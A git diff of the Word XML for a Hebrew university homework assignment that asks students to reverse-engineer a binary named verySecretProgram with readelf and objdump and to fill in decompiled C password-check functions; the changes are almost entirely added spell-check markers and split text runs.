           <v:shape id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.75pt;margin-top:7.95pt;width:416.75pt;height:398.6pt;z-index:251659264;visibility:visible;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
             <v:textbox style="mso-next-textbox:#_x0000_s1030">
               <w:txbxContent>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -453,8 +453,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> טאוב</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>טאוב</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -469,8 +479,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> בשביל להגיע להרצאה באת"מ</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> בשביל להגיע להרצאה </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>באת"מ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -535,6 +555,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. בתוך הדיסק-און-אי נמצא קובץ ההרצה </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -542,13 +563,32 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (המוצרף לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>המוצרף</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -558,13 +598,31 @@
         </w:rPr>
         <w:t xml:space="preserve"> מומלץ להיעזר בכלים עליהם למדנו בקורס (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>objdump, readelf</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>objdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -608,6 +666,7 @@
         </w:rPr>
         <w:t xml:space="preserve">שימו לב: שני חלקי התרגיל מבוססים על אותו קובץ </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -615,6 +674,7 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -694,8 +754,17 @@
           <w:rStyle w:val="Strong"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Reverse Engenering</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Engenering</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -805,14 +874,34 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf -h verySecretProgram</w:t>
-      </w:r>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>verySecretProgram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -934,14 +1023,34 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf -h verySecretProgram</w:t>
-      </w:r>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>verySecretProgram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -2119,6 +2228,7 @@
         </w:rPr>
         <w:t>ב-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2126,6 +2236,7 @@
         </w:rPr>
         <w:t>Decompiler</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2148,8 +2259,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו להשתחזר</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>להשתחזר</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2305,7 +2426,41 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checkPasswordAux(char* s){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPasswordAux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2365,6 +2520,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2385,6 +2541,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2413,6 +2570,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2443,6 +2601,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2509,8 +2668,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> c = *s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> c = *</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2589,6 +2760,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2609,6 +2781,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2657,6 +2830,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2677,6 +2851,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2761,8 +2936,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(c){</w:t>
-      </w:r>
+        <w:t>(c</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2809,7 +2996,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp; 1</w:t>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2821,6 +3019,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2899,6 +3098,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2919,6 +3119,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2973,8 +3174,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>          s++;</w:t>
-      </w:r>
+        <w:t>          s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3069,8 +3282,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sum;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>sum;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3155,7 +3380,41 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checkPassword(char* s){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3193,8 +3452,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>char* copy = s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">char* copy = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3241,7 +3512,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(checkPasswordAux(s) &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPasswordAux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(s) &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3253,6 +3546,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3273,6 +3567,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3331,6 +3626,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3351,6 +3647,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3405,8 +3702,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>     s = copy;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">     s = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>copy;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3455,6 +3764,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> y = </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3475,6 +3785,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3503,6 +3814,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3523,6 +3835,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3639,7 +3952,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>'a'</w:t>
+        <w:t>'a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3651,6 +3975,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3679,6 +4004,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3697,7 +4023,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(x</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3807,6 +4144,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3827,6 +4165,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3903,6 +4242,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3921,7 +4261,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(y &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4011,6 +4362,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4031,6 +4383,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4117,6 +4470,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> 26y + </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4137,6 +4491,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4163,8 +4518,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>         s++;</w:t>
-      </w:r>
+        <w:t>         s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4259,7 +4626,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>y == hash</w:t>
+        <w:t xml:space="preserve">y == </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4271,6 +4649,7 @@
         </w:rPr>
